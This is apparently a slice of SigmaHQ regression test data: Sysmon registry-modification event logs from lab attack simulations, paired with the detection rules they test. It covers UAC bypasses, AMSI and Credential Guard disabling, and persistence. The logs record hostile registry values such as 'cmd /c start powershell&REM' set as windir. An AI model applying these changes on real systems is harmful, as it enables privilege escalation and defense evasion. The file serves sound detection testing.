    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:28:03.064387Z\"\n        }\n      },\n      \"EventRecordID\": 27517409,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:28:03.060\",\n      \"ProcessGuid\": \"5AA13A44-5A23-68FE-2155-000000004002\",\n      \"ProcessId\": 4400,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\AtomicSafeMode\\\\(Default)\",\n      \"Details\": \"Service\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml",
    "content": "id: 26f40be2-5b94-4e29-9e34-2e8efb43d6f8\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 1547e27c-3974-43e2-a7d7-7f484fb928ec\n      title: Registry Persistence via Service in Safe Mode\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:33:36.133400Z\"\n        }\n      },\n      \"EventRecordID\": 27619790,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:33:36.131\",\n      \"ProcessGuid\": \"5AA13A44-5B70-68FE-4655-000000004002\",\n      \"ProcessId\": 8024,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\AtomicRedTeam\\\\Driver\",\n      \"Details\": \"C:\\\\AtomicRedTeam\\\\atomics\\\\T1547.010\\\\bin\\\\PortMonitor.dll\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/info.yml",
    "content": "id: 8f807b19-07e7-4471-b4ff-d961f2e1d71f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e\n      title: Add Port Monitor Persistence in Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:36:04.950926Z\"\n        }\n      },\n      \"EventRecordID\": 27665830,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:36:04.941\",\n      \"ProcessGuid\": \"5AA13A44-5C04-68FE-5855-000000004002\",\n      \"ProcessId\": 10080,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml",
    "content": "id: a9bcd1ab-6556-4fc3-b9c9-724b335485e4\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b\n      title: Allow RDP Remote Assistance Feature\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-25T10:58:31.890479Z\"\n        }\n      },\n      \"EventRecordID\": 16031,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-12-25 10:58:31.888\",\n      \"ProcessGuid\": \"0197231E-EC48-694C-AA0C-000000000800\",\n      \"ProcessId\": 12456,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-2555720767-1205513275-3893774561-1001\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml",
    "content": "id: a02685df-b4dd-4f5b-b120-9127e1662022\ndescription: N/A\ndate: 2025-12-25\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: aa37cbb0-da36-42cb-a90f-fdf216fc7467\n      title: AMSI Disabled via Registry Modification\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:41:48.911849Z\"\n        }\n      },\n      \"EventRecordID\": 27772045,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:41:48.898\",\n      \"ProcessGuid\": \"5AA13A44-5D5B-68FE-7B55-000000004002\",\n      \"ProcessId\": 420,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute\",\n      \"Details\": \"(Empty)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml",
    "content": "id: 7fce1d05-2297-48a4-a670-f28745819c8a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 46dd5308-4572-4d12-aa43-8938f0184d4f\n      title: Bypass UAC Using DelegateExecute\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:43:38.730630Z\"\n        }\n      },\n      \"EventRecordID\": 27806256,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:43:38.715\",\n      \"ProcessGuid\": \"5AA13A44-5DCA-68FE-8B55-000000004002\",\n      \"ProcessId\": 9920,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)\",\n      \"Details\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml",
    "content": "id: a6667fba-7437-4b37-8584-5de021f91115\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af\n      title: Bypass UAC Using Event Viewer\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:50:12.576627Z\"\n        }\n      },\n      \"EventRecordID\": 27929906,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:50:12.565\",\n      \"ProcessGuid\": \"5AA13A44-5F54-68FE-B455-000000004002\",\n      \"ProcessId\": 2768,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Environment\\\\windir\",\n      \"Details\": \"cmd /c start powershell&REM\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml",
    "content": "id: 48965782-760d-4620-9bf3-7fb0bb441d0f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 724ea201-6514-4f38-9739-e5973c34f49a\n      title: Bypass UAC Using SilentCleanup Task\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:10:21.083557Z\"\n        }\n      },\n      \"EventRecordID\": 28299540,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:10:21.071\",\n      \"ProcessGuid\": \"5AA13A44-640D-68FE-3756-000000004002\",\n      \"ProcessId\": 992,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber\",\n      \"Details\": \"DWORD (0x00001189)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/info.yml",
    "content": "id: 88bf1ccf-789d-4864-9eaf-547990ffe90a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 509e84b9-a71a-40e0-834f-05470369bd1e\n      title: Default RDP Port Changed to Non Standard Port\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:12:38.481829Z\"\n        }\n      },\n      \"EventRecordID\": 28344631,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:12:38.476\",\n      \"ProcessGuid\": \"5AA13A44-6494-68FE-6A56-000000004002\",\n      \"ProcessId\": 7460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\bad-domain.com\\\\bad-subdomain\\\\https\",\n      \"Details\": \"DWORD (0x00000002)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:12:38.491176Z\"\n        }\n      },\n      \"EventRecordID\": 28344632,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:12:38.476\",\n      \"ProcessGuid\": \"5AA13A44-6494-68FE-6A56-000000004002\",\n      \"ProcessId\": 7460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\bad-domain.com\\\\bad-subdomain\\\\http\",\n      \"Details\": \"DWORD (0x00000002)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:12:38.500426Z\"\n        }\n      },\n      \"EventRecordID\": 28344633,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:12:38.492\",\n      \"ProcessGuid\": \"5AA13A44-6494-68FE-6A56-000000004002\",\n      \"ProcessId\": 7460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\bad-domain.com\\\\bad-subdomain\\\\*\",\n      \"Details\": \"DWORD (0x00000002)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/info.yml",
    "content": "id: a118df85-dbf8-48d6-a3a6-f6ddebf975b6\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393\n      title: IE Change Domain Zone\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-26T06:45:50.191274Z\"\n        }\n      },\n      \"EventRecordID\": 23575,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3484,\n          \"ThreadID\": 3424\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-12-26 06:45:50.187\",\n      \"ProcessGuid\": \"0197231E-2F1D-694E-F304-000000000A00\",\n      \"ProcessId\": 12232,\n      \"Image\": \"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\DeviceGuard\\\\EnableVirtualizationBasedSecurity\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/info.yml",
    "content": "id: 7d8d93c3-25b2-4225-9f91-66997f5b446f\ndescription: N/A\ndate: 2025-12-26\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0\n      title: Windows Credential Guard Disabled - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json",
